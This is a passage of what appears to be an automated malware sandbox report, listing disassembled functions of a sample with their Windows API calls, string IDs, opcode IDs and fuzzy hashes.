                                                  • Instruction Fuzzy Hash: D101D170E00344EBC710DFA8AC42A6DF3B2AB09310F60567EF425A7391DF35A9018B99
                                                  Function 00408000 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 34COMMON
                                                  Download Yara Rule
                                                  APIs
                                                    • Part of subcall function 0040D10C: EnterCriticalSection.KERNEL32(004383D4,?,?,?,00401047,00438EBC), ref: 0040D117
                                                    • Part of subcall function 0040D10C: LeaveCriticalSection.KERNEL32(004383D4,?,?,?,00401047,00438EBC), ref: 0040D154
                                                  • __Init_thread_footer.LIBCMT ref: 00408069
                                                    • Part of subcall function 0040D0C2: EnterCriticalSection.KERNEL32(004383D4,?,?,00401082,00438EBC,00426B90), ref: 0040D0CC
                                                    • Part of subcall function 0040D0C2: LeaveCriticalSection.KERNEL32(004383D4,?,?,00401082,00438EBC,00426B90), ref: 0040D0FF
                                                    • Part of subcall function 0040D0C2: RtlWakeAllConditionVariable.NTDLL ref: 0040D176
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2603446200.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000000.00000002.2603446200.000000000043A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_400000_nRGKqzVQRt.jbxd
                                                  Similarity
                                                  • API ID: CriticalSection$EnterLeave$ConditionInit_thread_footerVariableWake
                                                  • String ID: @G@K$ZYA.
                                                  • API String ID: 2296764815-4236202813
                                                  • Opcode ID: 947c1552c58e194b7a3d6d09b3e8e23b227eb584c540669558338eb5038ea2ef
                                                  • Instruction ID: eb81366a0546a1846772a52cdd9905172eab691cb68f5f869d784b912a5327a9
                                                  • Opcode Fuzzy Hash: 947c1552c58e194b7a3d6d09b3e8e23b227eb584c540669558338eb5038ea2ef
                                                  • Instruction Fuzzy Hash: CC01AD74E003049FC750DFA8E982958B7B0AB88314F20517EF809673D1CE3C6948CB4D
                                                  Function 00407EF0 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 34COMMON
                                                  Download Yara Rule
                                                  APIs
                                                    • Part of subcall function 0040D10C: EnterCriticalSection.KERNEL32(004383D4,?,?,?,00401047,00438EBC), ref: 0040D117
                                                    • Part of subcall function 0040D10C: LeaveCriticalSection.KERNEL32(004383D4,?,?,?,00401047,00438EBC), ref: 0040D154
                                                  • __Init_thread_footer.LIBCMT ref: 00407F59
                                                    • Part of subcall function 0040D0C2: EnterCriticalSection.KERNEL32(004383D4,?,?,00401082,00438EBC,00426B90), ref: 0040D0CC
                                                    • Part of subcall function 0040D0C2: LeaveCriticalSection.KERNEL32(004383D4,?,?,00401082,00438EBC,00426B90), ref: 0040D0FF
                                                    • Part of subcall function 0040D0C2: RtlWakeAllConditionVariable.NTDLL ref: 0040D176
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2603446200.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000000.00000002.2603446200.000000000043A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_400000_nRGKqzVQRt.jbxd
                                                  Similarity
                                                  • API ID: CriticalSection$EnterLeave$ConditionInit_thread_footerVariableWake
                                                  • String ID: @G@K$A@K.
                                                  • API String ID: 2296764815-2457859030
                                                  • Opcode ID: 12fe1a893f377b097c77001a84ae484a33a6e34f4be5b5691fdf45b548d45959
                                                  • Instruction ID: 91eda301f18b728dd67868f27b5654014bad386d0337af4a7680e78ba29a92ce
                                                  • Opcode Fuzzy Hash: 12fe1a893f377b097c77001a84ae484a33a6e34f4be5b5691fdf45b548d45959
                                                  • Instruction Fuzzy Hash: DE016D74E007089BC710DFA8E982658B7B1AB48704F10617FF90567391DE39AD048B9D
                                                  Function 00668157 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 34COMMON
                                                  Download Yara Rule
                                                  APIs
                                                    • Part of subcall function 0066D373: RtlEnterCriticalSection.NTDLL(004383D4), ref: 0066D37E
                                                    • Part of subcall function 0066D373: RtlLeaveCriticalSection.NTDLL(004383D4), ref: 0066D3BB
                                                  • __Init_thread_footer.LIBCMT ref: 006681C0
                                                    • Part of subcall function 0066D329: RtlEnterCriticalSection.NTDLL(004383D4), ref: 0066D333
                                                    • Part of subcall function 0066D329: RtlLeaveCriticalSection.NTDLL(004383D4), ref: 0066D366
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2603827557.0000000000660000.00000040.00001000.00020000.00000000.sdmp, Offset: 00660000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_660000_nRGKqzVQRt.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: CriticalSection$EnterLeave$Init_thread_footer
                                                  • String ID: @G@K$A@K.
                                                  • API String ID: 4132704954-2457859030
                                                  • Opcode ID: eec83722eb2856bd13c5ccd16eeb5a217927af5c1102e52f61e64dd9668075e8
                                                  • Instruction ID: f45ce41480914a8e2c6c93e5e219a2cacc8f7ce179c679a1e02dbdb2bf14e94e
                                                  • Opcode Fuzzy Hash: eec83722eb2856bd13c5ccd16eeb5a217927af5c1102e52f61e64dd9668075e8
                                                  • Instruction Fuzzy Hash: 52011D74E40704ABC750DF68E982A5CF7B2AB49310F50517EF915A7391DE356D008B5D
                                                  Function 00668267 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 34COMMON
                                                  Download Yara Rule
                                                  APIs
                                                    • Part of subcall function 0066D373: RtlEnterCriticalSection.NTDLL(004383D4), ref: 0066D37E
                                                    • Part of subcall function 0066D373: RtlLeaveCriticalSection.NTDLL(004383D4), ref: 0066D3BB
                                                  • __Init_thread_footer.LIBCMT ref: 006682D0
                                                    • Part of subcall function 0066D329: RtlEnterCriticalSection.NTDLL(004383D4), ref: 0066D333
                                                    • Part of subcall function 0066D329: RtlLeaveCriticalSection.NTDLL(004383D4), ref: 0066D366
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2603827557.0000000000660000.00000040.00001000.00020000.00000000.sdmp, Offset: 00660000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_660000_nRGKqzVQRt.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: CriticalSection$EnterLeave$Init_thread_footer
                                                  • String ID: @G@K$ZYA.
                                                  • API String ID: 4132704954-4236202813
                                                  • Opcode ID: 9134ac4aeb42c9b5666236611bf206903469005546699b8f577cb70b6e54836c
                                                  • Instruction ID: 991f83f7b9b86541c962a6087c3b84793062492521919b81efaf50d0fea924f5
                                                  • Opcode Fuzzy Hash: 9134ac4aeb42c9b5666236611bf206903469005546699b8f577cb70b6e54836c
                                                  • Instruction Fuzzy Hash: CB016D70E40304AFC794DF68E89299DB7B1EB99320F60527EF81597391DE386A00CB5D
                                                  Function 0041EA79 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 30COMMON
                                                  Download Yara Rule
                                                  APIs
                                                  • GetOEMCP.KERNEL32(00000000,0041ECEA,00000000,00000000,004190D3,004190D3,00000000,7622DF80,00000000), ref: 0041EAA4
                                                  • GetACP.KERNEL32(00000000,0041ECEA,00000000,00000000,004190D3,004190D3,00000000,7622DF80,00000000), ref: 0041EABB
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2603446200.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000000.00000002.2603446200.000000000043A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_400000_nRGKqzVQRt.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID: A
                                                  • API String ID: 0-2078354741
                                                  • Opcode ID: 9e5e6d681178d40b1d22602b92e1b051e41c2617d79a70cd3cab338379cdb20d
                                                  • Instruction ID: 11c898d43c4d10c0ecc91de2811935f638b4c1e560e8759715af35a6ff81dd82
                                                  • Opcode Fuzzy Hash: 9e5e6d681178d40b1d22602b92e1b051e41c2617d79a70cd3cab338379cdb20d
                                                  • Instruction Fuzzy Hash: F2F062745002058BEB10DB65D8497ADF770BF40379F640359F529872E2CBB599C5CB4D
                                                  Function 0067ECE0 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 30COMMON
                                                  Download Yara Rule
                                                  APIs
                                                  • GetOEMCP.KERNEL32(00000000,0067EF51,00000000,00000000,0067933A,0067933A,00000000,004280A0,00000000), ref: 0067ED0B
                                                  • GetACP.KERNEL32(00000000,0067EF51,00000000,00000000,0067933A,0067933A,00000000,004280A0,00000000), ref: 0067ED22
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2603827557.0000000000660000.00000040.00001000.00020000.00000000.sdmp, Offset: 00660000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_660000_nRGKqzVQRt.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID:
                                                  • String ID: Qg
                                                  • API String ID: 0-32693547
                                                  • Opcode ID: 9e5e6d681178d40b1d22602b92e1b051e41c2617d79a70cd3cab338379cdb20d
                                                  • Instruction ID: a3be07086a2474e564d402b4ec381cde62d56ffe84b23fda1ee33dd380421ad1
                                                  • Opcode Fuzzy Hash: 9e5e6d681178d40b1d22602b92e1b051e41c2617d79a70cd3cab338379cdb20d
                                                  • Instruction Fuzzy Hash: F3F06270501205CFDB20DB68D8497ECB776AF15339F64869CF12D8B2E2CBB2A889C745
                                                  Function 0041F141 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 6COMMON
                                                  Download Yara Rule
                                                  APIs
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2603446200.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000000.00000002.2603446200.000000000043A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_400000_nRGKqzVQRt.jbxd
                                                  Similarity
                                                  • API ID: CommandLine
                                                  • String ID: h'u
                                                  • API String ID: 3253501508-1127183452
                                                  • Opcode ID: 7415cd40737852c7a0f7799154859fea8d1bdc9a4f176078ed3f31d3c4c4c558
                                                  • Instruction ID: 1ffe000cb4f914d954d427dde2e9719fee03db017e57dc0f08827ac48507dd83
                                                  • Opcode Fuzzy Hash: 7415cd40737852c7a0f7799154859fea8d1bdc9a4f176078ed3f31d3c4c4c558
                                                  • Instruction Fuzzy Hash: EAB008B890A7418BC7919F64AD18558BAB0BAA86023C165BDF515836A0DF35520ADA18
                                                  Function 10008D2F Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 6COMMON
                                                  Download Yara Rule
                                                  APIs
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2604696371.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                  • Associated: 00000000.00000002.2604682634.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000000.00000002.2604717524.0000000010011000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000000.00000002.2604732003.0000000010018000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_10000000_nRGKqzVQRt.jbxd
                                                  Similarity
                                                  • API ID: CommandLine
                                                  • String ID: h'u
                                                  • API String ID: 3253501508-1127183452
                                                  • Opcode ID: 3ba90f2367f8e0a18ddc49a1e9980fdff55fe193054f5fcf533812e7e38a396c
                                                  • Instruction ID: dc4300c7a51cdd2e4dbd1a00831958a42e7aa1dccf9adf5096b7a17c71704a83
                                                  • Opcode Fuzzy Hash: 3ba90f2367f8e0a18ddc49a1e9980fdff55fe193054f5fcf533812e7e38a396c
                                                  • Instruction Fuzzy Hash: 78B09278C00221BFEB048F3088CD0C47BA0B22C203380C0A5EA01C2720D634C1C1CF80
                                                  Function 0067F3A8 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 6COMMON
                                                  Download Yara Rule
                                                  APIs
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2603827557.0000000000660000.00000040.00001000.00020000.00000000.sdmp, Offset: 00660000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_660000_nRGKqzVQRt.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: CommandLine
                                                  • String ID: h'u
                                                  • API String ID: 3253501508-1127183452
                                                  • Opcode ID: 7415cd40737852c7a0f7799154859fea8d1bdc9a4f176078ed3f31d3c4c4c558
                                                  • Instruction ID: 1ffe000cb4f914d954d427dde2e9719fee03db017e57dc0f08827ac48507dd83
                                                  • Opcode Fuzzy Hash: 7415cd40737852c7a0f7799154859fea8d1bdc9a4f176078ed3f31d3c4c4c558
                                                  • Instruction Fuzzy Hash: EAB008B890A7418BC7919F64AD18558BAB0BAA86023C165BDF515836A0DF35520ADA18